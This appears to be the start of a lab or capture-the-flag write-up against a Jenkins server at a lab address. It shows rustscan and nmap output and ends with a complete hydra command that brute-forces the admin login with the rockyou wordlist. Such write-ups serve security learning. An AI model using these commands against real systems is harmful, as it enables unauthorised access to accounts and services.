dffc1dc67f3d55d2b14227b73b590c4ed09b5113
41796ff9d0e29c02c961daa93454942d9c6bea7d
d3c7c338d5d8370e5c61fd68e101237a4d438408
ab77beb9cdadc97f3644a00706076293ee8cbbd2
rustscan -a 10.150.150.38
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
30609/tcp open unknown syn-ack
nmap -sC -sV 10.150.150.38 -p 22,30609
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 64:63:02:cb:00:44:4a:0f:95:1a:34:8d:4e:60:38:1c (RSA)
| 256 0a:6e:10:95:de:3d:6d:4b:98:5f:f0:cf:cb:f5:79:9e (ECDSA)
|_ 256 08:04:04:08:51:d2:b4:a4:03:bb:02:71:2f:66:09:69 (ED25519)
30609/tcp open http Jetty 9.4.27.v20200227
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.27.v20200227)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Going to this page and we found a Jenkins login form
10.150.150.38:30609
First I intercepted the login request with BurpSuite to find the parameters being sent:
Then, the final hydra command looks like this:
hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.150.150.38 -s 30609 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"